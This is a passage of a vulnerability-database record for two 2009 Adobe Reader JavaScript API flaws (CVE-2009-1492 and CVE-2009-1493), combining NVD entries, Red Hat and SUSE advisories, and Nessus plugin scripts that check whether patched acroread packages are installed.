{"cve": [{"lastseen": "2018-11-30T12:24:34", "bulletinFamily": "NVD", "description": "The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.", "modified": "2018-11-08T15:28:19", "published": "2009-04-30T16:30:00", "id": "CVE-2009-1492", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1492", "title": "CVE-2009-1492", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-29T14:26:36", "bulletinFamily": "NVD", "description": "The customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.", "modified": "2017-09-28T21:34:23", "published": "2009-04-30T16:30:00", "id": "CVE-2009-1493", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1493", "title": "CVE-2009-1493", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:41:46", "bulletinFamily": "unix", "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader to\ncrash or, potentially, execute arbitrary code as the user running Adobe\nReader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. 
They contain\nAdobe Reader version 8.1.5, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.", "modified": "2018-05-26T04:26:19", "published": "2009-05-13T04:00:00", "id": "RHSA-2009:0478", "href": "https://access.redhat.com/errata/RHSA-2009:0478", "type": "redhat", "title": "(RHSA-2009:0478) Critical: acroread security update", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:28:41", "bulletinFamily": "unix", "description": "The Adobe Acrobat Reader \"acroread\" received fixes for two vulnerabilities in the JavaScript API that allowed attackers to execute arbitrary code with a malformed PDF file.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-05-20T18:01:50", "published": "2009-05-20T18:01:50", "id": "SUSE-SA:2009:027", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-05/msg00001.html", "title": "remote code execution in acroread", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:09:51", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)", "modified": "2016-12-21T00:00:00", "published": "2009-09-24T00:00:00", "id": "SUSE_11_ACROREAD_JA-090519.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41366", "title": "SuSE 11 Security Update : acroread_ja (SAT Patch Number 904)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41366);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:19 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"SuSE 11 Security Update : acroread_ja (SAT Patch Number 904)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=499097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1492.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1493.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 904.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread_ja\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread_ja-8.1.5-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:19", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. 
(CVE-2009-1492,CVE-2009-1493)", "modified": "2016-01-27T00:00:00", "published": "2009-05-22T00:00:00", "id": "SUSE_ACROREAD-6258.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=38856", "title": "openSUSE 10 Security Update : acroread (acroread-6258)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-6258.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38856);\n script_version (\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/01/27 16:45:02 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"openSUSE 10 Security Update : acroread (acroread-6258)\");\n script_summary(english:\"Check for the acroread-6258 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. 
(CVE-2009-1492,CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( 
rpm_check(release:\"SUSE10.3\", reference:\"acroread-8.1.5-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:39", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)", "modified": "2016-12-22T00:00:00", "published": "2011-01-27T00:00:00", "id": "SUSE_ACROREAD-6260.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51691", "title": "SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 6260)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51691);\n script_version (\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:44 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 6260)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. 
(CVE-2009-1492 / CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1492.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1493.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6260.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the 
'\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-8.1.5-0.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:39", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)", "modified": "2016-12-22T00:00:00", "published": "2011-01-27T00:00:00", "id": "SUSE_ACROREAD_JA-6264.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51706", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6264)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51706);\n script_version (\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:44 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6264)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. 
(CVE-2009-1492 / CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1492.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1493.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6264.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the 
'\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread_ja-8.1.5-1.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:33", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492,CVE-2009-1493)", "modified": "2016-01-27T00:00:00", "published": "2009-07-21T00:00:00", "id": "SUSE_11_1_ACROREAD-090519.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40183", "title": "openSUSE Security Update : acroread (acroread-893)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-893.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40183);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2016/01/27 16:45:02 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-893)\");\n script_summary(english:\"Check for the acroread-893 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. 
(CVE-2009-1492,CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=499097\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ 
\"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-8.1.5-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:28", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492,CVE-2009-1493)", "modified": "2016-01-27T00:00:00", "published": "2009-07-21T00:00:00", "id": "SUSE_11_0_ACROREAD-090519.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39907", "title": "openSUSE Security Update : acroread (acroread-893)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-893.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39907);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2016/01/27 16:45:02 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-893)\");\n script_summary(english:\"Check for the acroread-893 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary 
code with a malformed\nPDF file. (CVE-2009-1492,CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=499097\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) 
audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-8.1.5-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:43", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 3 Extras, Red Hat Enterprise\nLinux 4 Extras, and Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader\nto crash or, potentially, execute arbitrary code as the user running\nAdobe Reader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 8.1.5, which is not vulnerable to these\nissues. 
All running instances of Adobe Reader must be restarted for\nthe update to take effect.", "modified": "2019-01-02T00:00:00", "published": "2009-08-24T00:00:00", "id": "REDHAT-RHSA-2009-0478.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40744", "title": "RHEL 3 / 4 / 5 : acroread (RHSA-2009:0478)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:0478. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40744);\n script_version (\"1.27\");\n script_cvs_date(\"Date: 2019/01/02 16:37:55\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_bugtraq_id(34736, 34740);\n script_xref(name:\"RHSA\", value:\"2009:0478\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : acroread (RHSA-2009:0478)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 3 Extras, Red Hat Enterprise\nLinux 4 Extras, and Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nTwo flaws were discovered in 